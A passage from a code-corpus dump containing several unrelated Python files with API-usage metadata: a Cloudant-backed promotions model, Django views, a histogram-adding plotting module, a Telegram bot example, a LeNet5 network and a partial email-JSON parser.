"attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 304, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.TextBuffer", "line_number": 305, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 305, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.TextView", "line_number": 306, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 306, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.WrapMode", "line_number": 307, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 307, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 316, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 316, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 338, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 338, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 339, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 339, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 340, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 340, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 354, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 390, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 398, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 398, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 401, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 432, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 432, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 435, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.main_quit", "line_number": 456, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 456, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.main", "line_number": 458, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 458, "usage_type": "name"}]} +{"seq_id": "41109370414", "text": "# _\n# _ooOoo_\n# o8888888o\n# 88\" . \"88\n# (| -_- |)\n# O\\ = /O\n# ____/`---'\\____\n# .' \\\\| |// `.\n# / \\\\||| : |||// \\\n# / _||||| -:- |||||_ \\\n# | | \\\\\\ - /'| | |\n# | \\_| `\\`---'// |_/ |\n# \\ .-\\__ `-. -'__/-. /\n# ___`. .' /--.--\\ `. .'___\n# .\"\" '< `.___\\_<|>_/___.' _> \\\"\".\n# | | : `- \\`. ;`. _/; .'/ / .' ; |\n# \\ \\ `-. \\_\\_`. _.'_/_/ -' _.' /\n# ===========`-.`___`-.__\\ \\___ /__.-'_.'_.-'================\n# `=--=-' BUG FREE\n\"\"\"\nAll models should be defined here\n\"\"\"\n\nimport os\nimport sys\nimport time\nimport json\nimport logging\nfrom cloudant.client import Cloudant\nfrom cloudant.query import Query\nfrom requests import HTTPError, ConnectionError\nfrom cloudant.adapters import Replay429Adapter\n\n# get configruation from enviuronment (12-factor)\nADMIN_PARTY = os.environ.get('ADMIN_PARTY', 'False').lower() == 'true'\nCLOUDANT_HOST = os.environ.get('CLOUDANT_HOST', 'localhost')\nCLOUDANT_USERNAME = os.environ.get('CLOUDANT_USERNAME', 'admin')\nCLOUDANT_PASSWORD = os.environ.get('CLOUDANT_PASSWORD', 'pass')\n\n\nclass DatabaseConnectionError(Exception):\n \"\"\" Custom Exception when database connection fails \"\"\"\n\n\nclass DataValidationError(Exception):\n \"\"\" Used for an data validation errors when deserializing \"\"\"\n\n\nclass Promotion():\n \"\"\"\n Class that represents a Promotion\n\n This version uses a NoSQL database CouchDB for persistence\n which is hidden from us by using Cloudant library\n \"\"\"\n logger = logging.getLogger('flask.app')\n client = None # cloudant.client.Cloudant\n database = None # cloudant.database.CloudantDatabase\n\n def __init__(self, code=None, products=None,\n percentage=None, expiry_date=None, start_date=None):\n \"\"\" Constructor \"\"\"\n self.id = None\n self.code = code\n self.products = products\n self.percentage = percentage\n self.expiry_date = expiry_date\n self.start_date = start_date\n\n def create(self):\n \"\"\"\n Creates a new Promotion in the database\n \"\"\"\n self.validate()\n\n try:\n document = self.database.create_document(self.serialize())\n except HTTPError as err:\n Promotion.logger.warning('Create failed: %s', err)\n return\n\n if document.exists():\n self.id = document['_id']\n\n def update(self):\n \"\"\" Updates a Promotion in the database \"\"\"\n self.validate()\n\n if self.id:\n try:\n document = self.database[self.id]\n except KeyError:\n document = None\n if document:\n document.update(self.serialize())\n document.save()\n\n def save(self):\n \"\"\" Saves a Promotion in the database \"\"\"\n if self.id:\n self.update()\n else:\n self.create()\n\n def delete(self):\n \"\"\" Deletes a Promotion from the database \"\"\"\n if self.id:\n try:\n document = self.database[self.id]\n except KeyError:\n document = None\n if document:\n document.delete()\n\n def validate(self):\n \"\"\" object fields validation \"\"\"\n if self.code is None or self.code == '':\n raise DataValidationError('code attribute is not set')\n if self.products is None:\n raise DataValidationError('products attribute is not set')\n if self.percentage is None:\n raise DataValidationError('percentage attribute is not set')\n if self.expiry_date is None:\n raise DataValidationError('expiry_date attribute is not set')\n if self.start_date is None:\n raise DataValidationError('start_date attribute is not set')\n if self.start_date > self.expiry_date:\n raise DataValidationError('start date should not be larger than expiry date')\n if self.percentage < 0 or self.percentage > 100:\n raise DataValidationError(\n 'Percentage should be in the range of 0 to 100')\n\n # Check if this promotion conflicts with any existing promotions\n promotions = Promotion.find_by_code(self.code)\n for promotion in promotions:\n if self.id is not None and self.id == promotion.id:\n continue\n\n if (promotion.start_date <= self.start_date and self.start_date <= promotion.expiry_date) or \\\n (promotion.start_date <= self.expiry_date and self.expiry_date <= promotion.expiry_date):\n raise DataValidationError('This new/updated promotion conflicts with promotion({})'.format(promotion.id))\n\n def serialize(self):\n \"\"\" Serializes a Promotion into a dictionary \"\"\"\n return {\n \"id\": self.id,\n \"code\": self.code,\n \"products\": self.products,\n \"percentage\": self.percentage,\n \"expiry_date\": self.expiry_date,\n \"start_date\": self.start_date,\n }\n\n def deserialize(self, data):\n \"\"\"\n Deserializes a Promotion from a dictionary\n\n Args:\n data (dict): A dictionary containing the Promotion data\n \"\"\"\n try:\n self.code = data['code']\n self.percentage = int(data['percentage'])\n self.expiry_date = int(data['expiry_date'])\n self.start_date = int(data['start_date'])\n self.products = data['products']\n except KeyError as error:\n raise DataValidationError(\n 'Invalid promotion: missing ' + error.args[0])\n except ValueError as error:\n raise DataValidationError(\n 'Invalid promotion value: ' + error.args[0])\n\n # if there is no id and the data has one, assign it\n if not self.id and '_id' in data:\n self.id = data['_id']\n\n return self\n \n def is_active(self):\n \"\"\"\n A promotion is active if the current timestamp is in its range [start_date, expiry_date]\n \"\"\"\n now_ts = time.time()\n return self.start_date <= now_ts and now_ts <= self.expiry_date\n\n######################################################################\n# S T A T I C D A T A B S E M E T H O D S\n######################################################################\n @classmethod\n def connect(cls):\n \"\"\" Connect to the server \"\"\"\n cls.client.connect()\n\n @classmethod\n def disconnect(cls):\n \"\"\" Disconnect from the server \"\"\"\n cls.client.disconnect()\n\n @classmethod\n def remove_all(cls):\n \"\"\" Removes all documents from the database (use for testing) \"\"\"\n for document in cls.database:\n document.delete()\n\n @classmethod\n def all(cls):\n \"\"\" Query that returns all Promotions \"\"\"\n results = []\n for doc in cls.database:\n promotion = Promotion().deserialize(doc)\n promotion.id = doc['_id']\n results.append(promotion)\n return results\n\n######################################################################\n# F I N D E R M E T H O D S\n######################################################################\n @classmethod\n def find_by(cls, **kwargs):\n \"\"\" Find records using selector \"\"\"\n query = Query(cls.database, selector=kwargs)\n results = []\n for doc in query.result:\n pet = Promotion()\n pet.deserialize(doc)\n results.append(pet)\n return results\n\n @classmethod\n def find(cls, promotion_id):\n \"\"\" Query that finds Promotions by their id \"\"\"\n try:\n document = cls.database[promotion_id]\n except KeyError:\n return None\n if '_rev' in document:\n return Promotion().deserialize(document)\n return None\n\n @classmethod\n def find_by_code(cls, code):\n \"\"\" Query that finds Promotions by their code \"\"\"\n return cls.find_by(code=code)\n\n############################################################\n# C L O U D A N T D A T A B A S E C O N N E C T I O N\n############################################################\n @staticmethod\n def init_db(dbname='promotions'):\n \"\"\"\n Initialized Coundant database connection\n \"\"\"\n opts = {}\n vcap_services = {}\n # Try and get VCAP from the environment or a file if developing\n if 'VCAP_SERVICES' in os.environ:\n Promotion.logger.info('Running in Bluemix mode.')\n vcap_services = json.loads(os.environ['VCAP_SERVICES'])\n # if VCAP_SERVICES isn't found, maybe we are running on Kubernetes?\n elif 'BINDING_CLOUDANT' in os.environ:\n Promotion.logger.info('Found Kubernetes Bindings')\n creds = json.loads(os.environ['BINDING_CLOUDANT'])\n vcap_services = {\"cloudantNoSQLDB\": [{\"credentials\": creds}]}\n else:\n Promotion.logger.info(\n 'VCAP_SERVICES and BINDING_CLOUDANT undefined.')\n creds = {\n \"username\": CLOUDANT_USERNAME,\n \"password\": CLOUDANT_PASSWORD,\n \"host\": CLOUDANT_HOST,\n \"port\": 5984,\n \"url\": \"http://\"+CLOUDANT_HOST+\":5984/\"\n }\n vcap_services = {\"cloudantNoSQLDB\": [{\"credentials\": creds}]}\n\n # Look for Cloudant in VCAP_SERVICES\n for service in vcap_services:\n if service.startswith('cloudantNoSQLDB'):\n cloudant_service = vcap_services[service][0]\n opts['username'] = cloudant_service['credentials']['username']\n opts['password'] = cloudant_service['credentials']['password']\n opts['host'] = cloudant_service['credentials']['host']\n opts['port'] = cloudant_service['credentials']['port']\n opts['url'] = cloudant_service['credentials']['url']\n\n if any(k not in opts for k in ('host', 'username', 'password', 'port', 'url')):\n raise DatabaseConnectionError('Error - Failed to retrieve options. '\n 'Check that app is bound to a Cloudant service.')\n\n Promotion.logger.info('Cloudant Endpoint: %s', opts['url'])\n try:\n if ADMIN_PARTY:\n Promotion.logger.info('Running in Admin Party Mode...')\n Promotion.client = Cloudant(opts['username'],\n opts['password'],\n url=opts['url'],\n connect=True,\n auto_renew=True,\n admin_party=ADMIN_PARTY,\n adapter=Replay429Adapter(\n retries=10, initialBackoff=0.1)\n )\n except ConnectionError:\n raise DatabaseConnectionError(\n 'Cloudant service could not be reached')\n\n # Create database if it doesn't exist\n try:\n Promotion.database = Promotion.client[dbname]\n except KeyError:\n # Create a database using an initialized client\n Promotion.database = Promotion.client.create_database(dbname)\n # check for success\n if not Promotion.database.exists():\n raise DatabaseConnectionError(\n 'Database [{}] could not be obtained'.format(dbname))\n", "repo_name": "devops-fall-2019-promotions-squad/promotions", "sub_path": "service/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 11854, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.environ.get", "line_number": 35, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 36, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 37, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 38, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 38, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 56, "usage_type": "call"}, {"api_name": "requests.HTTPError", "line_number": 78, "usage_type": "name"}, {"api_name": "time.time", "line_number": 184, "usage_type": "call"}, {"api_name": "cloudant.query.Query", "line_number": 222, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 257, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 259, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 259, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 261, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 263, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 263, "usage_type": "attribute"}, {"api_name": "cloudant.client.Cloudant", "line_number": 295, "usage_type": "call"}, {"api_name": "cloudant.adapters.Replay429Adapter", "line_number": 301, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 304, "usage_type": "name"}]} +{"seq_id": "19043265501", "text": "from django.shortcuts import render, redirect\n\nfrom .form_profile import RefereeForm\nfrom .models_profile import Referee\nfrom .views import loginA\n\n\ndef referee(request):\n if request.user.is_authenticated:\n return render(request, 'profile/input_referee.html')\n else:\n return loginA(request)\n\n\ndef create(request):\n if request.user.is_authenticated:\n if request.method == 'POST':\n form = RefereeForm(request.POST)\n print(form)\n if form.is_valid():\n referees = form.save(commit=False)\n referees.image = request.FILES['image']\n referees.save()\n return render(request, 'profile/input_referee.html', {'form': form})\n else:\n form = RefereeForm()\n return render(request, 'app/base.html', {'form': form})\n\n\ndef list(request):\n if request.user.is_authenticated:\n if request.method == 'POST' and 'delete_id' in request.POST:\n delete_id = request.POST.getlist('delete_id')\n\n try:\n referees = Referee.objects.filter(id__in=delete_id)\n referees.delete()\n except Referee.DoesNotExist:\n pass\n\n if request.method == 'POST' and 'edit_id' in request.POST:\n edit_id = request.POST['edit_id']\n try:\n referees = Referee.objects.get(id=edit_id)\n return render(request, 'profile/update_referee.html', {'referees': referees,\n \"id\": edit_id})\n\n except Referee.DoesNotExist:\n pass\n\n referees = Referee.objects.all()\n\n return render(request, 'profile/tables_referee.html', {'referees': referees})\n\n return render(request, 'profile/tables_referee.html', {'referees': None})\n\n\ndef update(request, id):\n if request.method == 'POST':\n fullname = request.POST.get('fullname')\n object = request.POST.get('object')\n image = request.POST.get('image')\n sex = request.POST.get('sex')\n social_network = request.POST.get('social_network')\n date_of_birth = request.POST.get('date_of_birth')\n achier = request.POST.get('achier')\n home_live = request.POST.get('home_live')\n career = request.POST.get('career')\n referees = Referee(\n id=id,\n fullname=fullname,\n object=object,\n image=image,\n sex=sex,\n social_network=social_network,\n date_of_birth=date_of_birth,\n achier=achier,\n home_live=home_live,\n career=career,\n )\n referees.image = request.FILES['image']\n referees.save()\n return redirect('list_referee')\n return render(request, 'app/base.html')\n\n\n", "repo_name": "Duongguyen/django_server", "sub_path": "app/views_referee.py", "file_name": "views_referee.py", "file_ext": "py", "file_size_in_byte": 2832, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.shortcuts.render", "line_number": 10, "usage_type": "call"}, {"api_name": "views.loginA", "line_number": 12, "usage_type": "call"}, {"api_name": "form_profile.RefereeForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "form_profile.RefereeForm", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 27, "usage_type": "call"}, {"api_name": "models_profile.Referee.objects.filter", "line_number": 36, "usage_type": "call"}, {"api_name": "models_profile.Referee.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models_profile.Referee", "line_number": 36, "usage_type": "name"}, {"api_name": "models_profile.Referee.DoesNotExist", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models_profile.Referee", "line_number": 38, "usage_type": "name"}, {"api_name": "models_profile.Referee.objects.get", "line_number": 44, "usage_type": "call"}, {"api_name": "models_profile.Referee.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models_profile.Referee", "line_number": 44, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "models_profile.Referee.DoesNotExist", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models_profile.Referee", "line_number": 48, "usage_type": "name"}, {"api_name": "models_profile.Referee.objects.all", "line_number": 51, "usage_type": "call"}, {"api_name": "models_profile.Referee.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "models_profile.Referee", "line_number": 51, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 53, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "models_profile.Referee", "line_number": 69, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 83, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "32392659439", "text": "# -*- coding: utf-8 -*-\n\nimport logging\nimport Artus.Utility.logger as logger\nlog = logging.getLogger(__name__)\n\nimport sys\n\nimport Artus.HarryPlotter.analysisbase as analysisbase\nimport Artus.HarryPlotter.utility.roottools as roottools\n\n\nclass AddHistograms(analysisbase.AnalysisBase):\n\t\"\"\"Create sum of histograms. This module does exactly the same as SumOfHistograms, but is can enable different addition steps together with this module.\"\"\"\n\n\tdef modify_argument_parser(self, parser, args):\n\t\tsuper(AddHistograms, self).modify_argument_parser(parser, args)\n\n\t\tself.add_histograms_options = parser.add_argument_group(\"{} options\".format(self.name()))\n\t\tself.add_histograms_options.add_argument(\n\t\t\t\t\"--add-nicks\", nargs=\"+\",\n\t\t\t\thelp=\"Nick names (whitespace separated) for the histograms to be added\"\n\t\t)\n\t\tself.add_histograms_options.add_argument(\n\t\t\t\t\"--add-scale-factors\", nargs=\"+\",\n\t\t\t\thelp=\"Scale factor (whitespace separated) for the histograms to be added [Default: 1].\"\n\t\t)\n\t\tself.add_histograms_options.add_argument(\n\t\t\t\t\"--add-result-nicks\", nargs=\"+\",\n\t\t\t\thelp=\"Nick names for the resulting sum histograms.\"\n\t\t)\n\n\tdef prepare_args(self, parser, plotData):\n\t\tsuper(AddHistograms, self).prepare_args(parser, plotData)\n\t\tself.prepare_list_args(plotData, [\"add_nicks\", \"add_result_nicks\", \"add_scale_factors\"])\n\t\t\n\t\tfor index, (add_nicks, add_result_nick, add_scale_factors) in enumerate(zip(\n\t\t\t\t*[plotData.plotdict[k] for k in [\"add_nicks\", \"add_result_nicks\", \"add_scale_factors\"]]\n\t\t)):\n\t\t\tplotData.plotdict[\"add_nicks\"][index] = add_nicks.split()\n\t\t\tnot_found_inputs = list(set(plotData.plotdict[\"add_nicks\"][index]) - set(plotData.plotdict[\"nicks\"]))\n\t\t\tif len(not_found_inputs) > 0:\n\t\t\t\tlog.critical(\"--add-nicks \\\"\" + (\"\\\", \\\"\".join(not_found_inputs)) + \"\\\" not found in list of --nicks \\\"\" + (\"\\\", \\\"\".join(plotData.plotdict[\"nicks\"])) + \"\\\"!\")\n\t\t\t\tsys.exit(1)\n\t\t\tif add_scale_factors is None:\n\t\t\t\tplotData.plotdict[\"add_scale_factors\"][index] = [1] * len(add_nicks.split())\n\t\t\telse:\n\t\t\t\tplotData.plotdict[\"add_scale_factors\"][index] = [float(add_scale_factor) for add_scale_factor in add_scale_factors.split()]\n\t\t\tif add_result_nick is None:\n\t\t\t\tplotData.plotdict[\"add_result_nicks\"][index] = \"add_{}\".format(\n\t\t\t\t\t\t\"_\".join(plotData.plotdict[\"add_nicks\"][index]),\n\t\t\t\t)\n\t\t\tif not plotData.plotdict[\"add_result_nicks\"][index] in plotData.plotdict[\"nicks\"]:\n\t\t\t\tplotData.plotdict[\"nicks\"].insert(\n\t\t\t\t\t\tplotData.plotdict[\"nicks\"].index(plotData.plotdict[\"add_nicks\"][index][0]),\n\t\t\t\t\t\tplotData.plotdict[\"add_result_nicks\"][index]\n\t\t\t\t)\n\n\tdef run(self, plotData=None):\n\t\tsuper(AddHistograms, self).run(plotData)\n\t\t\n\t\tfor add_nicks, add_scale_factors, add_result_nick in zip(\n\t\t\t\t*[plotData.plotdict[k] for k in [\"add_nicks\", \"add_scale_factors\", \"add_result_nicks\"]]\n\t\t):\n\t\t\t\n\t\t\tlog.debug(\"AddHistograms: \"+add_result_nick+\" = \"+(\" + \".join([str(scale)+\"*\"+nick for nick, scale in zip(add_nicks, add_scale_factors)])))\n\t\t\tplotData.plotdict[\"root_objects\"][add_result_nick] = roottools.RootTools.add_root_histograms(\n\t\t\t\t\t*[plotData.plotdict[\"root_objects\"][nick] for nick in add_nicks],\n\t\t\t\t\tscale_factors=add_scale_factors\n\t\t\t)\n\n", "repo_name": "artus-analysis/Artus", "sub_path": "HarryPlotter/python/analysis_modules/addhistograms.py", "file_name": "addhistograms.py", "file_ext": "py", "file_size_in_byte": 3148, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "Artus.HarryPlotter.analysisbase.AnalysisBase", "line_number": 13, "usage_type": "attribute"}, {"api_name": "Artus.HarryPlotter.analysisbase", "line_number": 13, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 44, "usage_type": "call"}, {"api_name": "Artus.HarryPlotter.utility.roottools.RootTools.add_root_histograms", "line_number": 67, "usage_type": "call"}, {"api_name": "Artus.HarryPlotter.utility.roottools.RootTools", "line_number": 67, "usage_type": "attribute"}, {"api_name": "Artus.HarryPlotter.utility.roottools", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "26136198379", "text": "import asyncio\nfrom telebot import async_telebot, types\nfrom telemod import Listener, TimeOut\n\nbot = async_telebot.AsyncTeleBot(token=\"\")\nloop = asyncio.get_event_loop()\n\nlistener = Listener(bot=bot, loop=loop)\n\n@bot.message_handler(commands=[\"start\"])\nasync def start_handler(message: types.Message):\n try:\n msg = await listener.listen_to(message, \"What's your name?\", timeout=10)\n except TimeOut:\n msg = None\n await bot.reply_to(message, \"Time Out\")\n if msg:\n return await bot.reply_to(msg, f\"Hi {msg.text}\")\n\nasync def main():\n print((await bot.get_me()).first_name)\n # await listener.start()\n await bot.infinity_polling(skip_pending=True)\n\nloop.run_until_complete(main())\n", "repo_name": "x72x/tele-mod", "sub_path": "examples/timeout_example.py", "file_name": "timeout_example.py", "file_ext": "py", "file_size_in_byte": 722, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "86", "api": [{"api_name": "telebot.async_telebot.AsyncTeleBot", "line_number": 5, "usage_type": "call"}, {"api_name": "telebot.async_telebot", "line_number": 5, "usage_type": "name"}, {"api_name": "asyncio.get_event_loop", "line_number": 6, "usage_type": "call"}, {"api_name": "telemod.Listener", "line_number": 8, "usage_type": "call"}, {"api_name": "telebot.types.Message", "line_number": 11, "usage_type": "attribute"}, {"api_name": "telebot.types", "line_number": 11, "usage_type": "name"}, {"api_name": "telemod.TimeOut", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "21197011314", "text": "import torch \nfrom torch.utils.data import Dataset, DataLoader\nimport torch.nn as nn\nimport torchvision.transforms as transforms\n\n\n#Defining the convolutional neural network\nclass LeNet5(nn.Module):\n def __init__(self, num_classes):\n super().__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 6, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(6),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.fc = nn.Linear(400, 120)\n self.relu = nn.ReLU()\n self.fc1 = nn.Linear(120, 84)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Linear(84, num_classes)\n \n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.reshape(out.size(0), -1)\n out = self.fc(out)\n out = self.relu(out)\n out = self.fc1(out)\n out = self.relu1(out)\n out = self.fc2(out)\n return out\n\nif __name__ == '__main__':\n print('shouldnt do anything')\n\n\n\n\t ", "repo_name": "sela847/SignAlert", "sub_path": "python/Shaaran/PyQtGUI/LeNetModel.py", "file_name": "LeNetModel.py", "file_ext": "py", "file_size_in_byte": 1236, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torch.nn.Module", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "20990295509", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 17 11:36:13 2020\r\n\r\n@author: Yadnesh\r\n\"\"\"\r\n\r\nimport json\r\nimport re \r\n\r\ndef cleanfile():\r\n with open('data.json',encoding='utf-8') as f:\r\n filedata = f.read()\r\n filedata = filedata.replace(\"'id'\", '\"id\"')\r\n filedata = filedata.replace(\"'threadId'\", '\"threadId\"')\r\n filedata = filedata.replace(\"'labelIds'\", '\"labelIds\"')\r\n filedata = filedata.replace(\"'payload'\", '\"payload\"')\r\n filedata = filedata.replace(\"'partId'\", '\"partId\"')\r\n filedata = filedata.replace(\"'headers'\", '\"headers\"')\r\n filedata = filedata.replace(\"'name'\", '\"name\"')\r\n filedata = filedata.replace(\"'value'\", '\"value\"')\r\n filedata = filedata.replace(\"'sizeEstimate'\", '\"sizeEstimate\"')\r\n filedata = filedata.replace(\"'historyId'\", '\"historyId\"')\r\n filedata = filedata.replace(\"'internalDate'\", '\"internalDate\"')\r\n filedata = filedata.replace(\"NONE\", \"\")\r\n filedata = filedata.replace(\"none\", \"\")\r\n print(filedata)\r\n f=eval(filedata)\r\n \r\n return f\r\n\r\ndef check(email): \r\n # Make a regular expression \r\n # for validating an Email \r\n regex = '^[a-z0-9]+[\\._]?[a-z0-9]+[@]\\w+[.]\\w{2,3}$'\r\n # pass the regular expression \r\n # and the string in search() method \r\n if(re.search(regex,email)): \r\n print(\"Valid Email\") \r\n return 1\r\n else: \r\n print(\"Invalid Email\") \r\n\r\ndef ProcessData(f):\r\n list1= list(f['messages'])\r\n list_final=[]\r\n for elements in list1:\r\n sep_dict = dict(elements)\r\n \r\n dictionary = { \r\n \"id\": '',\r\n \"history_id\":'' ,\r\n \"thread_id\" : '',\r\n \"labels\": [],\r\n \"from\": \"\",\r\n \"from_name\": \"\",\r\n \"subject\": \"\",\r\n \"date\": \"\",\r\n \"to\": {}\r\n }\r\n\r\n dictionary['id']=sep_dict['id']\r\n dictionary['history_id']=sep_dict['historyId']\r\n dictionary['thread_id']=sep_dict['threadId']\r\n dictionary['labels']=sep_dict['labelIds']\r\n\r\n InnerList=list(sep_dict['payload']['headers'])\r\n\r\n print(len(InnerList))\r\n\r\n for i in InnerList:\r\n fromstring=str(i['name'])\r\n x=[]\r\n if(fromstring)==str('From'):\r\n #print(i['value'])\r\n try:\r\n x = str(i['value']).split(\"<\", 2)\r\n x[1].replace('>', '')\r\n #print(x[0])\r\n #print(x[1])\r\n #dictionary['from']=i['value']\r\n dictionary['from']=str(x[0])\r\n dictionary['from_name']=str(x[1])\r\n except:\r\n print(\"\")\r\n if(fromstring)==str('Subject'):\r\n dictionary['subject']=str(i['value'])\r\n #print(str(i['value']))\r\n if(fromstring)==str('Date'):\r\n dictionary['date']=str(i['value'])\r\n #print(str(i['value']))\r\n if(fromstring)==str('To'):\r\n try:\r\n y = str(i['value']).split(\",\")\r\n except:\r\n y = str(i['value'])\r\n print(y)\r\n final_inner_list=[]\r\n for details in y:\r\n InnerDict={\r\n \"name\":\"\",\r\n \"email\":\"\"\r\n }\r\n #print(details)\r\n \r\n try:\r\n x1= str(details).split(\"<\", 2)\r\n str(x1[1]).replace('>', '')\r\n \r\n InnerDict[\"name\"] = str(x1[0])\r\n InnerDict[\"email\"] = str(x1[1])\r\n final_inner_list.append(InnerDict)\r\n except:\r\n c=check(x1[0])\r\n if(c==1):\r\n InnerDict[\"name\"] = \"\"\r\n InnerDict[\"email\"] = str(x1[0])\r\n final_inner_list.append(InnerDict)\r\n elif not str(x1[0]):\r\n InnerDict[\"name\"] = str(x1[0])\r\n InnerDict[\"email\"] = \"\" \r\n final_inner_list.append(InnerDict)\r\n print(\"single Entry\")\r\n \r\n dictionary['to']=final_inner_list\r\n\r\n 